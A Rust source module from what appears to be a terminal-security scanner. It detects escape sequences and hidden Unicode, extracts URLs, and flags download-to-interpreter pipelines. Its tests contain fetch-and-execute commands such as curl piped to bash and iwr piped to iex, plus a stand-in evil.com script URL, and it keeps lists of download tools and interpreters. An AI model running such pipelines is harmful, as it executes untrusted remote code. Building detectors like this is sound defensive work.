1use once_cell::sync::Lazy;
2use regex::Regex;
3
4use crate::parse::{self, UrlLike};
5use crate::tokenize::{self, Segment, ShellType};
6
7#[derive(Debug, Clone, Copy, PartialEq, Eq)]
9pub enum ScanContext {
10 Exec,
12 Paste,
14}
15
16#[allow(dead_code)]
18mod tier1_generated {
19 include!(concat!(env!("OUT_DIR"), "/tier1_gen.rs"));
20}
21
22pub fn extractor_ids() -> &'static [&'static str] {
24 tier1_generated::EXTRACTOR_IDS
25}
26
27static TIER1_EXEC_REGEX: Lazy<Regex> = Lazy::new(|| {
29 Regex::new(tier1_generated::TIER1_EXEC_PATTERN).expect("tier1 exec regex must compile")
30});
31
32static TIER1_PASTE_REGEX: Lazy<Regex> = Lazy::new(|| {
34 Regex::new(tier1_generated::TIER1_PASTE_PATTERN).expect("tier1 paste regex must compile")
35});
36
37static URL_REGEX: Lazy<Regex> = Lazy::new(|| {
39 Regex::new(
40 r#"(?:(?:https?|ftp|ssh|git)://[^\s'"<>]+)|(?:[a-zA-Z0-9._-]+@[a-zA-Z0-9._-]+:[^\s'"<>]+)"#,
41 )
42 .expect("url regex must compile")
43});
44
45pub struct ByteScanResult {
47 pub has_ansi_escapes: bool,
48 pub has_control_chars: bool,
49 pub has_bidi_controls: bool,
50 pub has_zero_width: bool,
51 pub has_invalid_utf8: bool,
52 pub details: Vec<ByteFinding>,
53}
54
55pub struct ByteFinding {
56 pub offset: usize,
57 pub byte: u8,
58 pub description: String,
59}
60
61pub fn tier1_scan(input: &str, context: ScanContext) -> bool {
63 match context {
64 ScanContext::Exec => TIER1_EXEC_REGEX.is_match(input),
65 ScanContext::Paste => TIER1_PASTE_REGEX.is_match(input),
66 }
67}
68
69pub fn scan_bytes(input: &[u8]) -> ByteScanResult {
71 let mut result = ByteScanResult {
72 has_ansi_escapes: false,
73 has_control_chars: false,
74 has_bidi_controls: false,
75 has_zero_width: false,
76 has_invalid_utf8: false,
77 details: Vec::new(),
78 };
79
80 if std::str::from_utf8(input).is_err() {
82 result.has_invalid_utf8 = true;
83 }
84
85 let len = input.len();
86 let mut i = 0;
87 while i < len {
88 let b = input[i];
89
90 if b == 0x1b {
92 if i + 1 < len {
93 let next = input[i + 1];
94 if next == b'[' || next == b']' || next == b'_' || next == b'P' {
95 result.has_ansi_escapes = true;
96 result.details.push(ByteFinding {
97 offset: i,
98 byte: b,
99 description: match next {
100 b'[' => "CSI escape sequence",
101 b']' => "OSC escape sequence",
102 b'_' => "APC escape sequence",
103 b'P' => "DCS escape sequence",
104 _ => "escape sequence",
105 }
106 .to_string(),
107 });
108 i += 2;
109 continue;
110 }
111 } else {
112 result.has_ansi_escapes = true;
114 result.details.push(ByteFinding {
115 offset: i,
116 byte: b,
117 description: "trailing escape byte".to_string(),
118 });
119 }
120 }
121
122 if b < 0x20 && b != b'\n' && b != b'\t' && b != 0x1b {
124 result.has_control_chars = true;
125 result.details.push(ByteFinding {
126 offset: i,
127 byte: b,
128 description: format!("control character 0x{b:02x}"),
129 });
130 }
131
132 if b == 0x7F {
134 result.has_control_chars = true;
135 result.details.push(ByteFinding {
136 offset: i,
137 byte: b,
138 description: "control character 0x7f (DEL)".to_string(),
139 });
140 }
141
142 if b >= 0xc0 {
144 let remaining = &input[i..];
146 if let Some(ch) = std::str::from_utf8(remaining)
147 .ok()
148 .or_else(|| std::str::from_utf8(&remaining[..remaining.len().min(4)]).ok())
149 .and_then(|s| s.chars().next())
150 {
151 if is_bidi_control(ch) {
153 result.has_bidi_controls = true;
154 result.details.push(ByteFinding {
155 offset: i,
156 byte: b,
157 description: format!("bidi control U+{:04X}", ch as u32),
158 });
159 }
160 if is_zero_width(ch) {
162 result.has_zero_width = true;
163 result.details.push(ByteFinding {
164 offset: i,
165 byte: b,
166 description: format!("zero-width character U+{:04X}", ch as u32),
167 });
168 }
169 i += ch.len_utf8();
170 continue;
171 }
172 }
173
174 i += 1;
175 }
176
177 result
178}
179
180fn is_bidi_control(ch: char) -> bool {
182 matches!(
183 ch,
184 '\u{200E}' | '\u{200F}' | '\u{202A}' | '\u{202B}' | '\u{202C}' | '\u{202D}' | '\u{202E}' | '\u{2066}' | '\u{2067}' | '\u{2068}' | '\u{2069}' )
196}
197
198fn is_zero_width(ch: char) -> bool {
200 matches!(
201 ch,
202 '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{FEFF}' )
207}
208
209pub fn extract_urls(input: &str, shell: ShellType) -> Vec<ExtractedUrl> {
212 let segments = tokenize::tokenize(input, shell);
213 let mut results = Vec::new();
214
215 for (seg_idx, segment) in segments.iter().enumerate() {
216 for mat in URL_REGEX.find_iter(&segment.raw) {
218 let raw = mat.as_str().to_string();
219 let url = parse::parse_url(&raw);
220 results.push(ExtractedUrl {
221 raw,
222 parsed: url,
223 segment_index: seg_idx,
224 in_sink_context: is_sink_context(segment, &segments),
225 });
226 }
227
228 let is_docker_cmd = segment.command.as_ref().is_some_and(|cmd| {
231 let cmd_lower = cmd.to_lowercase();
232 matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl")
233 });
234 if is_sink_context(segment, &segments) && !is_docker_cmd {
235 for arg in &segment.args {
236 let clean = strip_quotes(arg);
237 if looks_like_schemeless_host(&clean) && !URL_REGEX.is_match(&clean) {
238 results.push(ExtractedUrl {
239 raw: clean.clone(),
240 parsed: UrlLike::SchemelessHostPath {
241 host: extract_host_from_schemeless(&clean),
242 path: extract_path_from_schemeless(&clean),
243 },
244 segment_index: seg_idx,
245 in_sink_context: true,
246 });
247 }
248 }
249 }
250
251 if let Some(cmd) = &segment.command {
253 let cmd_lower = cmd.to_lowercase();
254 if matches!(cmd_lower.as_str(), "docker" | "podman" | "nerdctl") {
255 if let Some(docker_subcmd) = segment.args.first() {
256 let subcmd_lower = docker_subcmd.to_lowercase();
257 if subcmd_lower == "build" {
258 let mut i = 1;
260 while i < segment.args.len() {
261 let arg = strip_quotes(&segment.args[i]);
262 if (arg == "-t" || arg == "--tag") && i + 1 < segment.args.len() {
263 let tag_val = strip_quotes(&segment.args[i + 1]);
264 if !tag_val.is_empty() {
265 let docker_url = parse::parse_docker_ref(&tag_val);
266 results.push(ExtractedUrl {
267 raw: tag_val,
268 parsed: docker_url,
269 segment_index: seg_idx,
270 in_sink_context: true,
271 });
272 }
273 i += 2;
274 } else if arg.starts_with("-t") && arg.len() > 2 {
275 let tag_val = strip_quotes(&arg[2..]);
276 let docker_url = parse::parse_docker_ref(&tag_val);
277 results.push(ExtractedUrl {
278 raw: tag_val,
279 parsed: docker_url,
280 segment_index: seg_idx,
281 in_sink_context: true,
282 });
283 i += 1;
284 } else if let Some(val) = arg.strip_prefix("--tag=") {
285 let tag_val = strip_quotes(val);
286 let docker_url = parse::parse_docker_ref(&tag_val);
287 results.push(ExtractedUrl {
288 raw: tag_val,
289 parsed: docker_url,
290 segment_index: seg_idx,
291 in_sink_context: true,
292 });
293 i += 1;
294 } else {
295 i += 1;
296 }
297 }
298 } else if subcmd_lower == "image" {
299 if let Some(image_subcmd) = segment.args.get(1) {
301 let image_subcmd_lower = image_subcmd.to_lowercase();
302 if matches!(
303 image_subcmd_lower.as_str(),
304 "pull" | "push" | "inspect" | "rm" | "tag"
305 ) {
306 extract_first_docker_image(
307 &segment.args[2..],
308 seg_idx,
309 &mut results,
310 );
311 }
312 }
313 } else if matches!(subcmd_lower.as_str(), "pull" | "run" | "create") {
314 extract_first_docker_image(&segment.args[1..], seg_idx, &mut results);
316 }
317 }
318 }
319 }
320 }
321
322 results
323}
324
325#[derive(Debug, Clone)]
327pub struct ExtractedUrl {
328 pub raw: String,
329 pub parsed: UrlLike,
330 pub segment_index: usize,
331 pub in_sink_context: bool,
332}
333
334const DOCKER_VALUE_FLAGS: &[&str] = &["--platform", "--format", "--filter", "-f", "--label", "-l"];
336
337fn extract_first_docker_image(args: &[String], seg_idx: usize, results: &mut Vec<ExtractedUrl>) {
339 let mut skip_next = false;
340 for arg in args {
341 if skip_next {
342 skip_next = false;
343 continue;
344 }
345 let clean = strip_quotes(arg);
346 if clean == "--" {
347 break;
348 }
349 if clean.starts_with("--") && clean.contains('=') {
350 continue; }
352 if clean.starts_with('-') {
353 if DOCKER_VALUE_FLAGS.iter().any(|f| clean == *f) {
354 skip_next = true;
355 }
356 continue;
357 }
358 if !clean.contains("://") && clean != "." && clean != ".." && clean != "-" {
359 let docker_url = parse::parse_docker_ref(&clean);
360 results.push(ExtractedUrl {
361 raw: clean,
362 parsed: docker_url,
363 segment_index: seg_idx,
364 in_sink_context: true,
365 });
366 }
367 break; }
369}
370
371fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
373 if let Some(cmd) = &segment.command {
374 let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
375 let cmd_lower = cmd_base.to_lowercase();
376 if is_source_command(&cmd_lower) {
377 return true;
378 }
379 }
380
381 if let Some(sep) = &segment.preceding_separator {
383 if sep == "|" || sep == "|&" {
384 if let Some(cmd) = &segment.command {
386 let cmd_base = cmd.rsplit('/').next().unwrap_or(cmd);
387 if is_interpreter(cmd_base) {
388 return true;
389 }
390 }
391 }
392 }
393
394 false
395}
396
397fn is_source_command(cmd: &str) -> bool {
398 matches!(
399 cmd,
400 "curl"
401 | "wget"
402 | "fetch"
403 | "scp"
404 | "rsync"
405 | "git"
406 | "ssh"
407 | "docker"
408 | "podman"
409 | "nerdctl"
410 | "pip"
411 | "pip3"
412 | "npm"
413 | "npx"
414 | "yarn"
415 | "pnpm"
416 | "go"
417 | "cargo"
418 | "iwr"
419 | "irm"
420 | "invoke-webrequest"
421 | "invoke-restmethod"
422 )
423}
424
425fn is_interpreter(cmd: &str) -> bool {
426 matches!(
427 cmd,
428 "sh" | "bash"
429 | "zsh"
430 | "dash"
431 | "ksh"
432 | "python"
433 | "python3"
434 | "node"
435 | "perl"
436 | "ruby"
437 | "php"
438 | "iex"
439 | "invoke-expression"
440 )
441}
442
443fn strip_quotes(s: &str) -> String {
444 let s = s.trim();
445 if s.len() >= 2
446 && ((s.starts_with('"') && s.ends_with('"')) || (s.starts_with('\'') && s.ends_with('\'')))
447 {
448 s[1..s.len() - 1].to_string()
449 } else {
450 s.to_string()
451 }
452}
453
454fn looks_like_schemeless_host(s: &str) -> bool {
455 if s.starts_with('-') || !s.contains('.') {
457 return false;
458 }
459 let host_part = s.split('/').next().unwrap_or(s);
461 if !host_part.contains('.') || host_part.contains(' ') {
462 return false;
463 }
464 let file_exts = [
467 ".sh", ".py", ".rb", ".js", ".ts", ".go", ".rs", ".c", ".h", ".txt", ".md", ".json",
468 ".yaml", ".yml", ".xml", ".html", ".css", ".tar.gz", ".tar.bz2", ".tar.xz", ".tgz", ".zip",
469 ".gz", ".bz2", ".rpm", ".deb", ".pkg", ".dmg", ".exe", ".msi", ".dll", ".so", ".log",
470 ".conf", ".cfg", ".ini", ".toml",
471 ];
472 let host_lower = host_part.to_lowercase();
473 if file_exts.iter().any(|ext| host_lower.ends_with(ext)) {
474 return false;
475 }
476 let labels: Vec<&str> = host_part.split('.').collect();
478 if labels.len() < 2 {
479 return false;
480 }
481 let tld = labels.last().unwrap();
483 tld.len() >= 2 && tld.len() <= 63 && tld.chars().all(|c| c.is_ascii_alphabetic())
484}
485
486fn extract_host_from_schemeless(s: &str) -> String {
487 s.split('/').next().unwrap_or(s).to_string()
488}
489
490fn extract_path_from_schemeless(s: &str) -> String {
491 if let Some(idx) = s.find('/') {
492 s[idx..].to_string()
493 } else {
494 String::new()
495 }
496}
497
498#[cfg(test)]
499mod tests {
500 use super::*;
501
502 #[test]
503 fn test_tier1_exec_matches_url() {
504 assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
505 }
506
507 #[test]
508 fn test_tier1_exec_no_match_simple() {
509 assert!(!tier1_scan("ls -la", ScanContext::Exec));
510 }
511
512 #[test]
513 fn test_tier1_exec_no_match_echo() {
514 assert!(!tier1_scan("echo hello world", ScanContext::Exec));
515 }
516
517 #[test]
518 fn test_tier1_exec_matches_pipe_bash() {
519 assert!(tier1_scan("something | bash", ScanContext::Exec));
520 }
521
522 #[test]
523 fn test_tier1_exec_matches_pipe_sudo_bash() {
524 assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
525 }
526
527 #[test]
528 fn test_tier1_exec_matches_pipe_env_bash() {
529 assert!(tier1_scan("something | env bash", ScanContext::Exec));
530 }
531
532 #[test]
533 fn test_tier1_exec_matches_pipe_bin_bash() {
534 assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
535 }
536
537 #[test]
538 fn test_tier1_exec_matches_git_scp() {
539 assert!(tier1_scan(
540 "git clone git@github.com:user/repo",
541 ScanContext::Exec
542 ));
543 }
544
545 #[test]
546 fn test_tier1_exec_matches_punycode() {
547 assert!(tier1_scan(
548 "curl https://xn--example-cua.com",
549 ScanContext::Exec
550 ));
551 }
552
553 #[test]
554 fn test_tier1_exec_matches_docker() {
555 assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
556 }
557
558 #[test]
559 fn test_tier1_exec_matches_iwr() {
560 assert!(tier1_scan(
561 "iwr https://evil.com/script.ps1",
562 ScanContext::Exec
563 ));
564 }
565
566 #[test]
567 fn test_tier1_exec_matches_curl() {
568 assert!(tier1_scan(
569 "curl https://example.com/install.sh",
570 ScanContext::Exec
571 ));
572 }
573
574 #[test]
575 fn test_tier1_exec_matches_lookalike_tld() {
576 assert!(tier1_scan("open file.zip", ScanContext::Exec));
577 }
578
579 #[test]
580 fn test_tier1_exec_matches_shortener() {
581 assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
582 }
583
584 #[test]
585 fn test_tier1_paste_matches_non_ascii() {
586 assert!(tier1_scan("café", ScanContext::Paste));
587 }
588
589 #[test]
590 fn test_tier1_paste_exec_patterns_also_match() {
591 assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
592 }
593
594 #[test]
595 fn test_tier1_exec_no_non_ascii() {
596 assert!(!tier1_scan("echo café", ScanContext::Exec));
598 }
599
600 #[test]
601 fn test_byte_scan_ansi() {
602 let input = b"hello \x1b[31mred\x1b[0m world";
603 let result = scan_bytes(input);
604 assert!(result.has_ansi_escapes);
605 }
606
607 #[test]
608 fn test_byte_scan_control_chars() {
609 let input = b"hello\rworld";
610 let result = scan_bytes(input);
611 assert!(result.has_control_chars);
612 }
613
614 #[test]
615 fn test_byte_scan_bidi() {
616 let input = "hello\u{202E}dlrow".as_bytes();
617 let result = scan_bytes(input);
618 assert!(result.has_bidi_controls);
619 }
620
621 #[test]
622 fn test_byte_scan_zero_width() {
623 let input = "hel\u{200B}lo".as_bytes();
624 let result = scan_bytes(input);
625 assert!(result.has_zero_width);
626 }
627
628 #[test]
629 fn test_byte_scan_clean() {
630 let input = b"hello world\n";
631 let result = scan_bytes(input);
632 assert!(!result.has_ansi_escapes);
633 assert!(!result.has_control_chars);
634 assert!(!result.has_bidi_controls);
635 assert!(!result.has_zero_width);
636 }
637
638 #[test]
639 fn test_extract_urls_basic() {
640 let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
641 assert_eq!(urls.len(), 1);
642 assert_eq!(urls[0].raw, "https://example.com/install.sh");
643 }
644
645 #[test]
646 fn test_extract_urls_pipe() {
647 let urls = extract_urls(
648 "curl https://example.com/install.sh | bash",
649 ShellType::Posix,
650 );
651 assert!(!urls.is_empty());
652 assert!(urls[0].in_sink_context);
653 }
654
655 #[test]
656 fn test_extract_urls_scp() {
657 let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
658 assert!(!urls.is_empty());
659 assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
660 }
661
662 #[test]
663 fn test_extract_docker_ref() {
664 let urls = extract_urls("docker pull nginx", ShellType::Posix);
665 let docker_urls: Vec<_> = urls
666 .iter()
667 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
668 .collect();
669 assert_eq!(docker_urls.len(), 1);
670 }
671
672 #[test]
673 fn test_extract_powershell_iwr() {
674 let urls = extract_urls(
675 "iwr https://example.com/script.ps1 | iex",
676 ShellType::PowerShell,
677 );
678 assert!(!urls.is_empty());
679 }
680
681 #[test]
682 fn test_strip_quotes_single_char() {
683 assert_eq!(strip_quotes("\""), "\"");
684 assert_eq!(strip_quotes("'"), "'");
685 }
686
687 #[test]
688 fn test_strip_quotes_empty() {
689 assert_eq!(strip_quotes(""), "");
690 }
691
692 #[test]
693 fn test_scan_bytes_bel_vt_del() {
694 let input = b"hello\x07world";
696 let result = scan_bytes(input);
697 assert!(result.has_control_chars);
698
699 let input = b"hello\x0Bworld";
701 let result = scan_bytes(input);
702 assert!(result.has_control_chars);
703
704 let input = b"hello\x0Cworld";
706 let result = scan_bytes(input);
707 assert!(result.has_control_chars);
708
709 let input = b"hello\x7Fworld";
711 let result = scan_bytes(input);
712 assert!(result.has_control_chars);
713 }
714
715 #[test]
716 fn test_scan_bytes_osc_apc_dcs() {
717 let input = b"hello\x1b]0;title\x07world";
719 let result = scan_bytes(input);
720 assert!(result.has_ansi_escapes);
721
722 let input = b"hello\x1b_dataworld";
724 let result = scan_bytes(input);
725 assert!(result.has_ansi_escapes);
726
727 let input = b"hello\x1bPdataworld";
729 let result = scan_bytes(input);
730 assert!(result.has_ansi_escapes);
731 }
732
733 #[test]
734 fn test_schemeless_long_tld() {
735 assert!(looks_like_schemeless_host("example.academy"));
736 assert!(looks_like_schemeless_host("example.photography"));
737 }
738
739 #[test]
740 fn test_segment_index_correct() {
741 let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
742 for url in &urls {
744 assert!(url.segment_index <= 1);
746 }
747 }
748
749 #[test]
750 fn test_docker_build_context_not_image() {
751 let urls = extract_urls("docker build .", ShellType::Posix);
752 let docker_urls: Vec<_> = urls
753 .iter()
754 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
755 .collect();
756 assert_eq!(
757 docker_urls.len(),
758 0,
759 "build context '.' should not be treated as image"
760 );
761 }
762
763 #[test]
764 fn test_docker_image_subcmd() {
765 let urls = extract_urls("docker image pull nginx", ShellType::Posix);
766 let docker_urls: Vec<_> = urls
767 .iter()
768 .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
769 .collect();
770 assert_eq!(docker_urls.len(), 1);
771 }
772
773 #[test]
778 fn test_tier1_module_boundary_enforcement() {
779 let ids = tier1_generated::EXTRACTOR_IDS;
781 assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
782 let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
784 let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
785 assert!(exec_count > 0, "Must have exec fragments");
786 assert!(
787 paste_count >= exec_count,
788 "Paste fragments must be superset of exec fragments"
789 );
790 Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
792 .expect("Generated exec pattern must be valid regex");
793 Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
794 .expect("Generated paste pattern must be valid regex");
795 }
796}